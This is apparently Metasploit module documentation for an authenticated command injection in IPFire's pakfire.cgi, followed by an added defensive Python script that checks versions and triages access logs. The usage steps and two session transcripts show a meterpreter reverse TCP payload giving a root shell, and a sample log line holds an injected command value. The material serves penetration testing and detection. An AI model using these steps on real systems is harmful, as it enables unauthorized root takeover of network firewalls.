## Vulnerable Application

[IPFire 2.25 (Core Update 156)](https://downloads.ipfire.org/releases/ipfire-2.x/2.25-core156/ipfire-2.25.x86_64-full-core156.iso)

[IPFire 2.21 (Core Update 126)](https://mirror.csclub.uwaterloo.ca/ipfire/releases/ipfire-2.x/2.21-core126/ipfire-2.21.x86_64-full-core126.iso)

This module exploits an authenticated command injection vulnerability in the `/cgi-bin/pakfire.cgi` web page of IPFire devices running versions 2.25 Core Update 156 and prior to execute arbitrary code as the `root` user. Valid credentials for the web administration interface (TCP port 444 by default) are required. As the session output below shows, the module temporarily overwrites `backup.pl` on the target, runs the payload through `/usr/local/bin/backupctrl`, and then restores the original file; the change is reverted, but it does touch the target filesystem, which matters for file-integrity monitoring and for anyone doing forensics on the device afterwards.

## Verification Steps

1. Start msfconsole
1. Do: `use exploit/linux/http/ipfire_pakfire_exec`
1. Do: `set username `
1. Do: `set password `
1. Do: `set rhost `
1. Do: `set lhost `
1. Do: `exploit`
1. You should get a shell as the `root` user.

## Options

**USERNAME**

Username of the administrative user you are authenticating to the web portal as.

**PASSWORD**

Password for the administrative user you are authenticating to the web portal as.

## Scenarios

### IPFire 2.21 (Core Update 126)

```
msf6 > use exploit/linux/http/ipfire_pakfire_exec
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/http/ipfire_pakfire_exec) > show options

Module options (exploit/linux/http/ipfire_pakfire_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   yes       Password to login with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT     444              yes       The target port (TCP)
   SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)
   USERNAME  admin            yes       User to login with
   VHOST                      no        HTTP server virtual host


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Python Dropper


msf6 exploit(linux/http/ipfire_pakfire_exec) > set RHOSTS 172.29.202.191
RHOSTS => 172.29.202.191
msf6 exploit(linux/http/ipfire_pakfire_exec) > set USERNAME admin
USERNAME => admin
msf6 exploit(linux/http/ipfire_pakfire_exec) > set PASSWORD admin
PASSWORD => admin
msf6 exploit(linux/http/ipfire_pakfire_exec) > set LHOST 172.29.202.153
LHOST => 172.29.202.153
msf6 exploit(linux/http/ipfire_pakfire_exec) > exploit

[*] Started reverse TCP handler on 172.29.202.153:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Target is running IPFire 2.21 (Core Update 126)
[*] Backing up backup.pl to /tmp/1TiE8...
[*] Overwriting the contents of backup.pl with a Python header statement
[*] Appending the contents of backup.pl with the Python code to be executed.
[*] Executing /usr/local/bin/backupctrl to run the payload
[*] Sending stage (39392 bytes) to 172.29.202.191
[*] Meterpreter session 1 opened (172.29.202.153:4444 -> 172.29.202.191:38336) at 2021-06-08 14:05:41 -0500
[+] You should now have your shell, restoring the original contents of the backup.pl file...
[*] All done, enjoy the shells!

meterpreter > sysinfo
Computer     : ipfire.localdomain
OS           : Linux 4.14.86-ipfire #1 SMP Tue Dec 11 08:36:08 GMT 2018
Architecture : x64
Meterpreter  : python/linux
meterpreter > getuid
Server username: root
meterpreter > shell
Process 28379 created.
Channel 1 created.
sh: cannot set terminal process group (27956): Inappropriate ioctl for device
sh: no job control in this shell
sh-4.3# id
uid=0(root) gid=0(root) groups=0(root)
sh-4.3#
```

### IPFire 2.25 (Core Update 156)

```
msf6 > use exploit/linux/http/ipfire_pakfire_exec
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/http/ipfire_pakfire_exec) > show options

Module options (exploit/linux/http/ipfire_pakfire_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   yes       Password to login with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT     444              yes       The target port (TCP)
   SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)
   USERNAME  admin            yes       User to login with
   VHOST                      no        HTTP server virtual host


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Python Dropper


msf6 exploit(linux/http/ipfire_pakfire_exec) > set RHOST 172.29.202.157
RHOST => 172.29.202.157
msf6 exploit(linux/http/ipfire_pakfire_exec) > set USERNAME admin
USERNAME => admin
msf6 exploit(linux/http/ipfire_pakfire_exec) > set PASSWORD admin
PASSWORD => admin
msf6 exploit(linux/http/ipfire_pakfire_exec) > set LHOST 172.29.202.153
LHOST => 172.29.202.153
msf6 exploit(linux/http/ipfire_pakfire_exec) > exploit

[*] Started reverse TCP handler on 172.29.202.153:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Target is running IPFire 2.25 (Core Update 156)
[*] Backing up backup.pl to /tmp/8Yndo...
[*] Overwriting the contents of backup.pl with a Python header statement
[*] Appending the contents of backup.pl with the Python code to be executed.
[*] Executing /usr/local/bin/backupctrl to run the payload
[*] Sending stage (39392 bytes) to 172.29.202.157
[*] Meterpreter session 1 opened (172.29.202.153:4444 -> 172.29.202.157:37192) at 2021-06-08 14:02:03 -0500
[+] You should now have your shell, restoring the original contents of the backup.pl file...
[*] All done, enjoy the shells!

meterpreter > sysinfo
Computer     : ipfire.localdomain
OS           : Linux 4.14.212-ipfire #1 SMP Tue May 4 09:02:54 GMT 2021
Architecture : x64
Meterpreter  : python/linux
meterpreter > getuid
Server username: root
meterpreter > shell
Process 10179 created.
Channel 1 created.
sh: cannot set terminal process group (10136): Inappropriate ioctl for device
sh: no job control in this shell
sh-5.0# id
uid=0(root) gid=0(root) groups=0(root)
sh-5.0#
```
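
Two checks a practitioner would want next to this module, written here as an added example that is not part of the Metasploit module or of the IPFire project: a classifier for the affected range stated under Vulnerable Application (IPFire 2.25 Core Update 156 and prior, using the same banner form the module prints in its check output), and a heuristic pass over httpd access-log lines that flags requests to `/cgi-bin/pakfire.cgi` whose decoded query values contain shell metacharacters. The Combined Log Format layout, the `pkg` parameter name and the sample log lines are constructed assumptions; this page does not name the injected parameter.

```python
"""Triage helpers for the IPFire pakfire.cgi issue documented above.

Added example; this is not code from the Metasploit module or from IPFire.
Assumptions are marked inline.
"""
import re
from dataclasses import dataclass
from urllib.parse import parse_qsl, urlsplit

# From the module description: IPFire 2.25 Core Update 156 and prior are affected.
# IPFire 2.x core updates are one increasing counter across the 2.2x releases
# (2.21 shipped Core 126, 2.25 shipped Core 156), so the core number orders them.
LAST_VULNERABLE_CORE = 156

# Matches the banner form the module's check prints, e.g. "IPFire 2.25 (Core Update 156)".
_VERSION_RE = re.compile(
    r"IPFire\s+(?P<major>\d+)\.(?P<minor>\d+)\s*\(Core Update\s+(?P<core>\d+)\)"
)


def parse_version(banner):
    """Return (major, minor, core) from a banner string, or None if unrecognised."""
    m = _VERSION_RE.search(banner)
    if m is None:
        return None
    return int(m["major"]), int(m["minor"]), int(m["core"])


def is_vulnerable(banner):
    """True if the banner is inside the documented affected range, False if not,
    None if the version could not be parsed (do not treat None as safe)."""
    parsed = parse_version(banner)
    if parsed is None:
        return None
    major, _minor, core = parsed
    if major != 2:
        return False  # only the 2.x line is described on this page
    return core <= LAST_VULNERABLE_CORE


# Apache Combined Log Format. The field layout is an assumption about the target's
# httpd configuration, not something this page documents.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Characters that let a value break out of a shell command line. Checked on each
# decoded parameter value, so the '&' that separates query parameters is not counted.
_SHELL_META = re.compile(r"[;|&`$\n]")


@dataclass
class Finding:
    ip: str
    user: str
    ts: str
    method: str
    target: str
    param: str


def triage_httpd_log(lines):
    """Flag requests to /cgi-bin/pakfire.cgi whose query values carry shell
    metacharacters. Heuristic only: the injected parameter is not named on this
    page, and POST bodies never reach the access log, so a POST-based run of the
    module leaves only a bare 'POST /cgi-bin/pakfire.cgi' line here."""
    findings = []
    for line in lines:
        m = _LOG_RE.match(line)
        if m is None:
            continue
        url = urlsplit(m["target"])
        if url.path != "/cgi-bin/pakfire.cgi":
            continue
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if _SHELL_META.search(value):
                findings.append(Finding(m["ip"], m["user"], m["ts"], m["method"], m["target"], name))
                break
    return findings


# Constructed sample lines for the example; the "pkg" parameter name is made up.
SAMPLE_LOG = [
    '172.29.202.153 - admin [08/Jun/2021:14:02:01 -0500] "GET /cgi-bin/pakfire.cgi HTTP/1.1" 200 5120',
    '172.29.202.153 - admin [08/Jun/2021:14:02:02 -0500] "GET /cgi-bin/pakfire.cgi?pkg=foo%3Bid HTTP/1.1" 200 410',
    '172.29.202.153 - admin [08/Jun/2021:14:02:03 -0500] "POST /cgi-bin/pakfire.cgi HTTP/1.1" 200 410',
    '10.0.0.5 - - [08/Jun/2021:14:05:00 -0500] "GET /cgi-bin/index.cgi?q=a%3Bb HTTP/1.1" 200 100',
]


if __name__ == "__main__":
    for banner in ("IPFire 2.25 (Core Update 156)", "IPFire 2.21 (Core Update 126)",
                   "IPFire 2.25 (Core Update 157)"):
        print(f"{banner}: vulnerable={is_vulnerable(banner)}")
    for f in triage_httpd_log(SAMPLE_LOG):
        print(f"suspicious pakfire.cgi request from {f.ip} ({f.user}) at {f.ts}: "
              f"{f.method} {f.target} [param {f.param}]")
```

Run it with `python3`; only the second sample line is flagged. The third line is the shape a POST-based request leaves in the access log, which is why the version check and the `backup.pl` modification visible in the module output above are the more reliable indicators than the access log alone.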